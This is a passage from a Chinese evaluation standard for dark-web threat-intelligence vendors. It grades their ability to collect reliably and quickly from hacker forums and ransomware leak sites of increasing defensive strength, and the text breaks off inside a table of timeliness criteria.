leaf="">3.3.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">防御策略 / 反爬对抗能力</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.3.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">防御策略与反爬对抗能力是 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Traditional Dark Web 威胁源采集</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf=""> 的关键技术保障。其核心设计目的在于评估针对黑客论坛、勒索组织泄露站点等高价值目标所具备的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">反爬对抗与突破能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，保障情报采集工作能够稳定、持续开展。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Traditional Dark Web 中的高价值威胁源普遍采用严格的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">会员准入审核、异常行为检测、IP 与设备指纹限制、JS 动态渲染、Cloudflare 等多层级防护机制</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。若反爬对抗能力不足，将难以有效突破上述防御措施，极易出现采集中断、内容缺失或采集不稳定等问题，直接影响暗网情报的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">及时性与完整性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">从能力分级来看：</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">优秀级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">要求可稳定采集 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Tier1 级别高壁垒威胁源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">（如 XSS、Exploit 类核心站点），体现顶尖的反爬对抗技术实力；</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">良好级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">要求可稳定采集 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Tier2 级别威胁源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">（如 RansomHub、Qilin、Akira 等活跃勒索组织站点），具备成熟的实战对抗能力；</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">基础级</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">要求可稳定采集 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Tier3 级别威胁源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">（如 Breachforums、Darkforums 等公开度较高站点），满足基础采集可用要求。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，该指标直接决定暗网情报采集的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">可靠性与持续性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，为后续风险预警、事件研判和应急处置提供坚实的技术支撑。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.3.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标主要参考 Javelin Strategy &amp; Research《Dark Web Threat Intelligence Vendor Scorecard（2025）》中“</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Source Collection（威胁源采集能力）</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">”的评估维度，并在编制过程中充分借鉴全球暗网情报领域顶尖机构的技术分析成果，包括：</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Flashpoint《Technical Analysis of High-Wall Underground Forums: XSS and Exploit（2025）》</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Recorded Future《Defense Mechanisms in Russian Cybercrime Forums: XSS.is and Exploit.in Case Study（2025）》</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">结合 Traditional Dark Web 威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">实际防御策略特征</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与国内网络安全实战需求进行设定。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Traditional Dark Web 中的高价值威胁源普遍部署</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">多层次、高复杂度的防御机制</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，不同难度等级的威胁源，在</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">防护强度、技术复杂度及采集对抗成本</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">上存在显著差异，结合行业实战共识与技术特征，具体分级说明如下：</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Tier 1 级别</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">（以 XSS、Exploit 等为代表）：通常部署</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">最高等级防护体系</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，涵盖</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">企业级 Cloudflare 防护、严格会员制审核、邀请制注册、深度行为指纹检测、高强度 JS 动态渲染、多重 CAPTCHA 验证及复杂异形网站结构</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。此类威胁源构成暗网中</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">防御壁垒最高</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的场景，采集难度极大，需具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">极为成熟、全面的反爬对抗技术</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，才能实现稳定采集。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Tier 2 级别</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">（以 RansomHub、Qilin、Akira 等为代表）：多采用</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">标准 Cloudflare 防护</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，同时搭配大量</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">异形网站结构、特殊技术栈、访问速率限制及会话验证</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">等防御手段。相较于 Tier 1 级别，其整体防御强度有所降低，但仍具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">较高的采集对抗成本</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，尤其在适配异形结构、兼容特殊技术栈方面，需具备较强的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">技术适配与突破能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Tier 3 级别</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">（以 Breachforums、Darkforums 等为代表）：虽已普遍配备 Cloudflare 防护，但均为</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">基础级服务</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，搭配</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">常规 IP 封禁、简单验证码及标准反爬规则</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，整体防御强度相对较低，采集对抗成本也处于较低水平，基础反爬对抗技术即可实现有效突破与稳定采集。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基于上述威胁源防御特征的分级设计，本指标可</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">客观反映针对不同防御强度威胁源的反爬对抗水平</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，清晰区分不同能力层级的技术差距，为暗网情报采集对抗能力的量化评估，提供</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">科学、可对比、可落地的核心依据</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.3.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">防御策略与反爬对抗能力以对不同难度威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">稳定采集能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="133" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标项</span></strong></span></p></td><td data-colwidth="334" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标参数</span></strong></span></p></td><td data-colwidth="101" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:center;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">评判等级</span></strong></span></p></td></tr><tr><td rowspan="3" data-colwidth="133" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">防御策略/反爬对抗能力</span></span></p></td><td data-colwidth="334" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">稳定采集Tier3级别威胁源（Breachforums、Darkforums等）</span></span></p></td><td data-colwidth="101" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">基础</span></span></p></td></tr><tr><td data-colwidth="334" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">稳定采集Tier2级别威胁源（RansomHub、Qilin、Akira等）</span></span></p></td><td data-colwidth="101" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">良好</span></span></p></td></tr><tr><td data-colwidth="334" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">稳定采集Tier1级别威胁源（XSS、Exploit等）</span></span></p></td><td data-colwidth="101" valign="middle" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding:5px 10px;"><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">优秀</span></span></p></td></tr></tbody></table><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指标说明</span></strong></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标重点评估针对不同防御强度威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">反爬对抗水平</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。其中 Tier 1 级别代表</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">最高对抗难度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，Tier 2 级别代表</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">中高对抗难度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，Tier 3 级别代表</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">中低对抗难度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">通过该分级标准，可客观反映在 Traditional Dark Web 领域突破目标站点防御策略的技术实力，为后续情报采集的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">可靠性与持续性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">提供重要技术支撑。</span></span></p><h2 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Arial;"><span leaf="">3.4.</span></span><span style=""><span style="font-variant: normal;text-transform: none;font-family:黑体;"><span leaf="">情报采集时效性</span></span></span></h2><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.4.1.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计目的</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">情报采集时效性是 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Traditional Dark Web 威胁源采集能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf=""> 的重要评估维度。其核心设计目的在于衡量在不同难度威胁源上，从情报发布到完成采集的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">响应速度与效率</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">在实际威胁场景中，</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">高价值情报</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">（如新数据泄露帖、勒索软件通告、IAB 交易信息等）往往在暗网威胁源中呈现</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">短暂流通、快速扩散</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的特征。若采集时效性不足，将可能错过此类情报的关键窗口期，导致相关单位无法及时发现自身数据已在暗网流通或攻击活动正在发生，进而错失</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">最佳的风险阻断和应急应对时机</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">因此，该指标通过区分 Tier 1、Tier 2、Tier 3 不同难度威胁源的采集时效要求，客观评估在实战环境下的情报采集响应能力，为后续风险预警、事件研判和应急处置提供</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">及时、可靠的情报支撑</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，确保威胁情报能够发挥前置预警、快速响应的核心价值。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.4.2.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">设计依据</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">本指标主要参考 Javelin Strategy &amp; Research《Dark Web Threat Intelligence Vendor Scorecard》（2025）中“</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Source Collection（来源采集能力）</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">”的评估维度，并结合 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Traditional Dark Web</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf=""> 威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">实际发布特征</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">与</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">采集时效要求进行设定</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">Traditional Dark Web 中的高价值情报通常以 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">New Post</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf=""> 或 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">New Leak</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf=""> 的形式快速涌现，其核心价值随时间呈</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">指数级衰减</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">特征。鉴于不同难度等级的威胁源在采集技术门槛与响应时效要求上存在显著差异，本指标体系严格按照威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">对抗强度</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，将采集时效性划分为 </span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Tier 1</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">、</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Tier 2</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">、</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Tier 3</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf=""> 三个梯度进行量化评估。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">具体而言：</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Tier 1 级别威胁源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">（以 XSS、Exploit 等为代表）：因部署</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">最高等级防御体系</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，采集对抗成本与技术难度最大，对引擎的并发处理与实时抓取能力要求极高，因此设定</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">最严苛的时效标准</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，以确保高价值情报不被遗漏。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Tier 2 级别威胁源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">（以 RansomHub、Qilin、Akira 等为代表）：防御强度与采集复杂度次之，时效要求相应</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">适度降低</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，重点评估引擎突破常规防护后稳定获取情报的速度。</span></span></p><p style="text-align:left;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;margin-left: 42pt;text-indent: -21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:Wingdings;"><span leaf="">n</span></span><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><strong><span leaf="">Tier 3 级别威胁源</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">（以 Breachforums、Darkforums 等为代表）：防御机制相对基础，时效要求也</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">更为宽松</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，主要考察采集覆盖的广度与及时性。</span></span></p><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">通过这种</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">分级差异化</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">的设计，本指标能够精准、客观地反映引擎在不同对抗环境下对高价值情报的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">快速响应能力</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，确保评估结果具备</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">科学性、针对性</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">，并能直接指导实战中的风险预警与应急处置。</span></span></p><h3 style="margin-bottom: 16px;font-size:17px;"><span style="font-variant: normal;text-transform: none;font-family:Calibri;"><span leaf="">3.4.3.</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">指标参数</span></span></h3><p style="text-align:left;margin-left: 0pt;line-height: 150%;font-size: 12pt;font-weight: normal;margin-bottom: 16px;text-indent: 21pt;font-family:Calibri;"><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">情报采集时效性以不同难度威胁源的</span></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><strong><span leaf="">稳定采集延迟</span></strong></span><span style="font-variant: normal;text-transform: none;font-family:宋体;"><span leaf="">作为核心量化指标，具体分级标准如下：</span></span></p><table style="margin-left: 0.0;border: none;border-collapse: collapse;mso-border-top-alt: solid windowtext 0.5pt;mso-border-left-alt: solid windowtext 0.5pt;mso-border-bottom-alt: solid windowtext 0.5pt;mso-border-right-alt: solid windowtext 0.5pt;mso-padding-alt: 0pt 5.4pt 0pt 5.4pt;width: 100%;box-sizing:border-box;max-width:100% !important;"><tbody><tr><td data-colwidth="104" valign="middle" style="background: rgb(215, 215, 215);border-width: 1pt;border-style: 